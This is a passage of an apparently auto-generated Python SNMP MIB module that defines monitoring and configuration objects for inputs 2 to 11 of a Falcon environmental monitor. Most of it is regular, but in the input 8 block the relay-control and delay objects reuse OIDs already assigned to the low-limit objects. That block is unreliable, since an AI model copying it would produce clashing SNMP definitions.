falconInput2Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 5), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2Label.setStatus('mandatory')
falconInput2UOM = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 6), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2UOM.setStatus('mandatory')
falconInput2HighLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2HighLimit2.setStatus('mandatory')
falconInput2HighLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2HighLimit.setStatus('mandatory')
falconInput2LowLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2LowLimit.setStatus('mandatory')
falconInput2LowLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2LowLimit2.setStatus('mandatory')
falconInput2RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2RlyControl.setStatus('mandatory')
falconInput2Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 12), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2Delay.setStatus('mandatory')
falconInput2Hysteresis = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 2, 13), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput2Hysteresis.setStatus('mandatory')
falconInput3 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 3))
falconInput3State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 3, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("analog-4to20-installed", 2), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput3State.setStatus('mandatory')
falconInput3Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 3, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput3Reading.setStatus('mandatory')
falconInput3Gain = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 3, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput3Gain.setStatus('mandatory')
falconInput3Offset = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 3, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput3Offset.setStatus('mandatory')
falconInput3Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 3, 5), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput3Label.setStatus('mandatory')
falconInput3UOM = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 3, 6), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput3UOM.setStatus('mandatory')
falconInput3HighLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 3, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput3HighLimit2.setStatus('mandatory')
falconInput3HighLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 3, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput3HighLimit.setStatus('mandatory')
falconInput3LowLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 3, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput3LowLimit.setStatus('mandatory')
falconInput3LowLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 3, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput3LowLimit2.setStatus('mandatory')
falconInput3RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 3, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput3RlyControl.setStatus('mandatory')
falconInput3Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 3, 12), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput3Delay.setStatus('mandatory')
falconInput3Hysteresis = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 3, 13), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput3Hysteresis.setStatus('mandatory')
falconInput4 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 4))
falconInput4State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 4, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("analog-4to20-installed", 2), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput4State.setStatus('mandatory')
falconInput4Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 4, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput4Reading.setStatus('mandatory')
falconInput4Gain = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 4, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput4Gain.setStatus('mandatory')
falconInput4Offset = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 4, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput4Offset.setStatus('mandatory')
falconInput4Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 4, 5), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput4Label.setStatus('mandatory')
falconInput4UOM = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 4, 6), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput4UOM.setStatus('mandatory')
falconInput4HighLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 4, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput4HighLimit2.setStatus('mandatory')
falconInput4HighLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 4, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput4HighLimit.setStatus('mandatory')
falconInput4LowLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 4, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput4LowLimit.setStatus('mandatory')
falconInput4LowLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 4, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput4LowLimit2.setStatus('mandatory')
falconInput4RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 4, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput4RlyControl.setStatus('mandatory')
falconInput4Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 4, 12), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput4Delay.setStatus('mandatory')
falconInput4Hysteresis = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 4, 13), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput4Hysteresis.setStatus('mandatory')
falconInput5 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 5))
falconInput5State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 5, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("analog-4to20-installed", 2), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput5State.setStatus('mandatory')
falconInput5Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 5, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput5Reading.setStatus('mandatory')
falconInput5Gain = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 5, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput5Gain.setStatus('mandatory')
falconInput5Offset = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 5, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput5Offset.setStatus('mandatory')
falconInput5Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 5, 5), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput5Label.setStatus('mandatory')
falconInput5UOM = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 5, 6), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput5UOM.setStatus('mandatory')
falconInput5HighLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 5, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput5HighLimit2.setStatus('mandatory')
falconInput5HighLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 5, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput5HighLimit.setStatus('mandatory')
falconInput5LowLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 5, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput5LowLimit.setStatus('mandatory')
falconInput5LowLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 5, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput5LowLimit2.setStatus('mandatory')
falconInput5RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 5, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput5RlyControl.setStatus('mandatory')
falconInput5Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 5, 12), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput5Delay.setStatus('mandatory')
falconInput5Hysteresis = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 5, 13), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput5Hysteresis.setStatus('mandatory')
falconInput6 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 6))
falconInput6State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 6, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("analog-4to20-installed", 2), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput6State.setStatus('mandatory')
falconInput6Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 6, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput6Reading.setStatus('mandatory')
falconInput6Gain = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 6, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput6Gain.setStatus('mandatory')
falconInput6Offset = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 6, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput6Offset.setStatus('mandatory')
falconInput6Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 6, 5), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput6Label.setStatus('mandatory')
falconInput6UOM = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 6, 6), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput6UOM.setStatus('mandatory')
falconInput6HighLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 6, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput6HighLimit2.setStatus('mandatory')
falconInput6HighLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 6, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput6HighLimit.setStatus('mandatory')
falconInput6LowLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 6, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput6LowLimit.setStatus('mandatory')
falconInput6LowLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 6, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput6LowLimit2.setStatus('mandatory')
falconInput6RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 6, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput6RlyControl.setStatus('mandatory')
falconInput6Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 6, 12), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput6Delay.setStatus('mandatory')
falconInput6Hysteresis = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 6, 13), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput6Hysteresis.setStatus('mandatory')
falconInput7 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 7))
falconInput7State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 7, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("analog-4to20-installed", 2), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput7State.setStatus('mandatory')
falconInput7Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 7, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput7Reading.setStatus('mandatory')
falconInput7Gain = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 7, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput7Gain.setStatus('mandatory')
falconInput7Offset = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 7, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput7Offset.setStatus('mandatory')
falconInput7Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 7, 5), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput7Label.setStatus('mandatory')
falconInput7UOM = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 7, 6), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput7UOM.setStatus('mandatory')
falconInput7HighLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 7, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput7HighLimit2.setStatus('mandatory')
falconInput7HighLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 7, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput7HighLimit.setStatus('mandatory')
falconInput7LowLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 7, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput7LowLimit.setStatus('mandatory')
falconInput7LowLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 7, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput7LowLimit2.setStatus('mandatory')
falconInput7RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 7, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput7RlyControl.setStatus('mandatory')
falconInput7Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 7, 12), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput7Delay.setStatus('mandatory')
falconInput7Hysteresis = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 7, 13), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput7Hysteresis.setStatus('mandatory')
falconInput8 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8))
falconInput8State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("analog-4to20-installed", 2), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8State.setStatus('mandatory')
falconInput8Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput8Reading.setStatus('mandatory')
falconInput8Gain = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8Gain.setStatus('mandatory')
falconInput8Offset = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8Offset.setStatus('mandatory')
falconInput8Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 5), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8Label.setStatus('mandatory')
falconInput8UOM = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 6), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8UOM.setStatus('mandatory')
falconInput8HighLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8HighLimit2.setStatus('mandatory')
falconInput8HighLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8HighLimit.setStatus('mandatory')
falconInput8LowLimit = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8LowLimit.setStatus('mandatory')
falconInput8LowLimit2 = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8LowLimit2.setStatus('mandatory')
falconInput8RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8RlyControl.setStatus('mandatory')
falconInput8Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8Delay.setStatus('mandatory')
falconInput8Hysteresis = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 8, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput8Hysteresis.setStatus('mandatory')
falconInput9 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 25))
falconInput9State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 25, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput9State.setStatus('mandatory')
falconInput9Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 25, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput9Reading.setStatus('mandatory')
falconInput9Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 25, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput9Label.setStatus('mandatory')
falconInput9RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 25, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput9RlyControl.setStatus('mandatory')
falconInput9Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 25, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput9Delay.setStatus('mandatory')
falconInput10 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 26))
falconInput10State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 26, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput10State.setStatus('mandatory')
falconInput10Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 26, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput10Reading.setStatus('mandatory')
falconInput10Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 26, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput10Label.setStatus('mandatory')
falconInput10RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 26, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput10RlyControl.setStatus('mandatory')
falconInput10Delay = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 26, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 600))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput10Delay.setStatus('mandatory')
falconInput11 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 27))
falconInput11State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 27, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3, 4))).clone(namedValues=NamedValues(("notInstalled", 1), ("digital-no-installed", 3), ("digital-nc-installed", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput11State.setStatus('mandatory')
falconInput11Reading = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 27, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconInput11Reading.setStatus('mandatory')
falconInput11Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 27, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconInput11Label.setStatus('mandatory')
falconInput11RlyControl = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 3, 27, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
